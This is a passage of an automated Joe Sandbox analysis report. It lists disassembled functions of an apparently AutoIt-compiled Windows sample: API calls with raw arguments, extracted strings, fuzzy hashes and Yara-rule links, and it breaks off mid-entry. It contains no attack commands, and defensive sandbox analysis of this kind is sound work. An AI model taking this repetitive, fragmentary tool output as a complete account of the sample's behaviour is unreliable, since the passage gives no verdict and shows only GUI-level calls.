                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction ID: 82fbe367399ebebefca472821b341260be3c2f479a1d3353e173f3cb238f9fa5
                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction Fuzzy Hash: 6EC196322051978ADFAE463AC47413EBBB15EA27B131E075DDDB3CB1C4EE20CA25D621
                                                            Function 00D47806 Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 491filecommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 00D4785B
                                                            • DeleteObject.GDI32(00000000), ref: 00D4786D
                                                            • DestroyWindow.USER32 ref: 00D4787B
                                                            • GetDesktopWindow.USER32 ref: 00D47895
                                                            • GetWindowRect.USER32(00000000), ref: 00D4789C
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00D479DD
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00D479ED
                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47A35
                                                            • GetClientRect.USER32(00000000,?), ref: 00D47A41
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D47A7B
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47A9D
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47AB0
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47ABB
                                                            • GlobalLock.KERNEL32(00000000), ref: 00D47AC4
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47AD3
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00D47ADC
                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47AE3
                                                            • GlobalFree.KERNEL32(00000000), ref: 00D47AEE
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47B00
                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00D62CAC,00000000), ref: 00D47B16
                                                            • GlobalFree.KERNEL32(00000000), ref: 00D47B26
                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00D47B4C
                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00D47B6B
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47B8D
                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D47D7A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-3613752883
                                                            • Opcode ID: 4e4862b3fc97c4d2922e9040e81bbba73a7625445ca5c99fc98ba32720386b76
                                                            • Instruction ID: 1934023868a49afa172fd7a0f6ac4306692989b28fafcc3eeba4603396be8053
                                                            • Opcode Fuzzy Hash: 4e4862b3fc97c4d2922e9040e81bbba73a7625445ca5c99fc98ba32720386b76
                                                            • Instruction Fuzzy Hash: 1C022675900215AFDB14DFA8DD89EAE7BB9EB48311F148169F915EB3A1CB30AD01CB70
                                                            Function 00D5A5DA Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 00D5A630
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00D5A661
                                                            • GetSysColor.USER32(0000000F), ref: 00D5A66D
                                                            • SetBkColor.GDI32(?,000000FF), ref: 00D5A687
                                                            • SelectObject.GDI32(?,00000000), ref: 00D5A696
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00D5A6C1
                                                            • GetSysColor.USER32(00000010), ref: 00D5A6C9
                                                            • CreateSolidBrush.GDI32(00000000), ref: 00D5A6D0
                                                            • FrameRect.USER32(?,?,00000000), ref: 00D5A6DF
                                                            • DeleteObject.GDI32(00000000), ref: 00D5A6E6
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00D5A731
                                                            • FillRect.USER32(?,?,00000000), ref: 00D5A763
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00D5A78E
                                                              • Part of subcall function 00D5A8CA: GetSysColor.USER32(00000012), ref: 00D5A903
                                                              • Part of subcall function 00D5A8CA: SetTextColor.GDI32(?,?), ref: 00D5A907
                                                              • Part of subcall function 00D5A8CA: GetSysColorBrush.USER32(0000000F), ref: 00D5A91D
                                                              • Part of subcall function 00D5A8CA: GetSysColor.USER32(0000000F), ref: 00D5A928
                                                              • Part of subcall function 00D5A8CA: GetSysColor.USER32(00000011), ref: 00D5A945
                                                              • Part of subcall function 00D5A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D5A953
                                                              • Part of subcall function 00D5A8CA: SelectObject.GDI32(?,00000000), ref: 00D5A964
                                                              • Part of subcall function 00D5A8CA: SetBkColor.GDI32(?,00000000), ref: 00D5A96D
                                                              • Part of subcall function 00D5A8CA: SelectObject.GDI32(?,?), ref: 00D5A97A
                                                              • Part of subcall function 00D5A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00D5A999
                                                              • Part of subcall function 00D5A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D5A9B0
                                                              • Part of subcall function 00D5A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00D5A9C5
                                                              • Part of subcall function 00D5A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00D5A9ED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                            • String ID: @U=u
                                                            • API String ID: 3521893082-2594219639
                                                            • Opcode ID: 1fae1c875c443eed2e5ee4486a72d390f2f91cfd6dd957a9764ddd02b3690c7c
                                                            • Instruction ID: 3449d84cf13a5270c19a3e1826f62394a1b6a49fa95d506d109ccc4d8fd1a362
                                                            • Opcode Fuzzy Hash: 1fae1c875c443eed2e5ee4486a72d390f2f91cfd6dd957a9764ddd02b3690c7c
                                                            • Instruction Fuzzy Hash: 7D916E71008711AFCB119F68DC08E5B7BA9FB48322F140B29FD62DA2E1D771D944CB62
                                                            Function 00D5356B Relevance: 52.9, APIs: 6, Strings: 24, Instructions: 365windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,00D5F910), ref: 00D53627
                                                            • IsWindowVisible.USER32(?), ref: 00D5364B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpperVisibleWindow
                                                            • String ID: @U=u$ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                            • API String ID: 4105515805-3469695742
                                                            • Opcode ID: 73699a9a336b9697f54603df9163cfb46a96892328a4548f97d103f1da06a96e
                                                            • Instruction ID: a57072c4cebab1f21f25c89c81a0ded563ff0de4dc445f307024bde91fd9c874
                                                            • Opcode Fuzzy Hash: 73699a9a336b9697f54603df9163cfb46a96892328a4548f97d103f1da06a96e
                                                            • Instruction Fuzzy Hash: C3D161702043019BCF04EF10C965A7EB7A1EF94795F184459FD865B3A2DB31EE0AEB62
                                                            Function 00CD2C18 Relevance: 51.2, APIs: 27, Strings: 2, Instructions: 486windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?), ref: 00CD2CA2
                                                            • DeleteObject.GDI32(00000000), ref: 00CD2CE8
                                                            • DeleteObject.GDI32(00000000), ref: 00CD2CF3
                                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 00CD2CFE
                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 00CD2D09
                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00D0C43B
                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00D0C474
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00D0C89D
                                                              • Part of subcall function 00CD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00CD2036,?,00000000,?,?,?,?,00CD16CB,00000000,?), ref: 00CD1B9A
                                                            • SendMessageW.USER32(?,00001053), ref: 00D0C8DA
                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D0C8F1
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00D0C907
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00D0C912
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                            • String ID: 0$@U=u
                                                            • API String ID: 464785882-975001249
                                                            • Opcode ID: 578bcb31db14c463f89f9c5c4607a56e4c8bbf08a5be062c1f3abbca3289daeb
                                                            • Instruction ID: 64dcfd4fce860c21d06279a99d1c8b885848dcb31570a4400209cc5bb42b9545
                                                            • Opcode Fuzzy Hash: 578bcb31db14c463f89f9c5c4607a56e4c8bbf08a5be062c1f3abbca3289daeb
                                                            • Instruction Fuzzy Hash: 83129E30614201EFDB25CF24C888BA9B7E5FF54341F58566AF999CB2A2C731EC41DBA1
                                                            Function 00D474AB Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 284windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 00D474DE
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00D4759D
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00D475DB
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00D475ED
                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00D47633
                                                            • GetClientRect.USER32(00000000,?), ref: 00D4763F
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00D47683
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00D47692
                                                            • GetStockObject.GDI32(00000011), ref: 00D476A2
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00D476A6
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00D476B6
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D476BF
                                                            • DeleteDC.GDI32(00000000), ref: 00D476C8
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00D476F4
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00D4770B
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00D47746
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00D4775A
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00D4776B
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00D4779B
                                                            • GetStockObject.GDI32(00000011), ref: 00D477A6
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00D477B1
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00D477BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-2771358697
                                                            • Opcode ID: b2bf76acfba36843cd8e6edb91b655ec9b4cc11f38661d5bae6ebdc3e4d6ac91
                                                            • Instruction ID: 60f38fef0fdbb5d96a96969dc8b51c7b680419de8682f8544672e67731fa6531
                                                            • Opcode Fuzzy Hash: b2bf76acfba36843cd8e6edb91b655ec9b4cc11f38661d5bae6ebdc3e4d6ac91
                                                            • Instruction Fuzzy Hash: FEA15C71A40705BFEB149BA8DD4AFAE7BA9EB09711F004125FA15EB3E0D770AD00CB64
                                                            Function 00D5A8CA Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 187windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 00D5A903
                                                            • SetTextColor.GDI32(?,?), ref: 00D5A907
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00D5A91D
                                                            • GetSysColor.USER32(0000000F), ref: 00D5A928
                                                            • CreateSolidBrush.GDI32(?), ref: 00D5A92D
                                                            • GetSysColor.USER32(00000011), ref: 00D5A945
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D5A953
                                                            • SelectObject.GDI32(?,00000000), ref: 00D5A964
                                                            • SetBkColor.GDI32(?,00000000), ref: 00D5A96D
                                                            • SelectObject.GDI32(?,?), ref: 00D5A97A
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00D5A999
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D5A9B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00D5A9C5
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00D5A9ED
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00D5AA14
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00D5AA32
                                                            • DrawFocusRect.USER32(?,?), ref: 00D5AA3D
                                                            • GetSysColor.USER32(00000011), ref: 00D5AA4B
                                                            • SetTextColor.GDI32(?,00000000), ref: 00D5AA53
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00D5AA67
                                                            • SelectObject.GDI32(?,00D5A5FA), ref: 00D5AA7E
                                                            • DeleteObject.GDI32(?), ref: 00D5AA89
                                                            • SelectObject.GDI32(?,?), ref: 00D5AA8F
                                                            • DeleteObject.GDI32(?), ref: 00D5AA94
                                                            • SetTextColor.GDI32(?,?), ref: 00D5AA9A
                                                            • SetBkColor.GDI32(?,?), ref: 00D5AAA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID: @U=u
                                                            • API String ID: 1996641542-2594219639
                                                            • Opcode ID: a085aeea1352e56fcd38838f09fad7a4cea08799dd8a9f20b82e5a69efb30275
                                                            • Instruction ID: 3a61a5f2f2030790bacf81b48ebd3a6c143d945cc25583885d3b07fe4453210d
                                                            • Opcode Fuzzy Hash: a085aeea1352e56fcd38838f09fad7a4cea08799dd8a9f20b82e5a69efb30275
                                                            • Instruction Fuzzy Hash: 0E511C71900318AFDF119FA8DC48EAE7B79EB08322F254625FD11EB2A1D7719940DFA0
                                                            Function 00D3AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 00D3AD1E
                                                            • GetDriveTypeW.KERNEL32(?,00D5FAC0,?,\\.\,00D5F910), ref: 00D3ADFB
                                                            • SetErrorMode.KERNEL32(00000000,00D5FAC0,?,\\.\,00D5F910), ref: 00D3AF59
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 4adc003e65c1a0fa7ba350036e5bd2282e2187a5ddab1e5f8f3cca8cf58e7c70
                                                            • Instruction ID: 40cf8ed4e49b4faea77ab1f93b74b11997bdde9cd932cf2820a57a3d452be3b7
                                                            • Opcode Fuzzy Hash: 4adc003e65c1a0fa7ba350036e5bd2282e2187a5ddab1e5f8f3cca8cf58e7c70
                                                            • Instruction Fuzzy Hash: AA518FB4748205AF8B14EB18C982CBD73A1EF48740F644166F887AB2D1DA31ED05FB72
                                                            Function 00D59A1C Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 455windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00D59AD2
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00D59B8B
                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 00D59BA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: 0$@U=u
                                                            • API String ID: 2326795674-975001249
                                                            • Opcode ID: 4eca87e5ab7722ebf205bff8df9ea2a6de4b34232cbe0a8da918c670cc23ab95
                                                            • Instruction ID: fdca49a2f4a05aba7b2003a8ced0dffcafcd5cb17745e4e3744e05c669bd0c69
                                                            • Opcode Fuzzy Hash: 4eca87e5ab7722ebf205bff8df9ea2a6de4b34232cbe0a8da918c670cc23ab95
                                                            • Instruction Fuzzy Hash: 33029C30105301EBDB25CF24C869BAABBE5FF49316F08452DFD99DA2A1C774D948CB62
                                                            Function 00CD68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-86951937
                                                            • Opcode ID: 037a6ad5266ea50d0875b316c5b9d6bcc204af06020ead2775ddf7e9a99b99ca
                                                            • Instruction ID: 891188e79247d162e1be7245106f99412ab7af1842c2356175ce711e1726a1b8
                                                            • Opcode Fuzzy Hash: 037a6ad5266ea50d0875b316c5b9d6bcc204af06020ead2775ddf7e9a99b99ca
                                                            • Instruction Fuzzy Hash: 3581F6B1640219BBCB20BB61DC52FBF7768AF15740F044026FE49AB2D2EB71DA45E271
                                                            Function 00D589D5 Relevance: 40.7, APIs: 21, Strings: 2, Instructions: 401windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00D58AC1
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D58AD2
                                                            • CharNextW.USER32(0000014E), ref: 00D58B01
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00D58B42
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00D58B58
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D58B69
                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00D58B86
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00D58BD8
                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00D58BEE
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D58C1F
                                                            • _memset.LIBCMT ref: 00D58C44
                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00D58C8D
                                                            • _memset.LIBCMT ref: 00D58CEC
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D58D16
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00D58D6E
                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00D58E1B
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00D58E3D
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00D58E87
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00D58EB4
                                                            • DrawMenuBar.USER32(?), ref: 00D58EC3
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00D58EEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
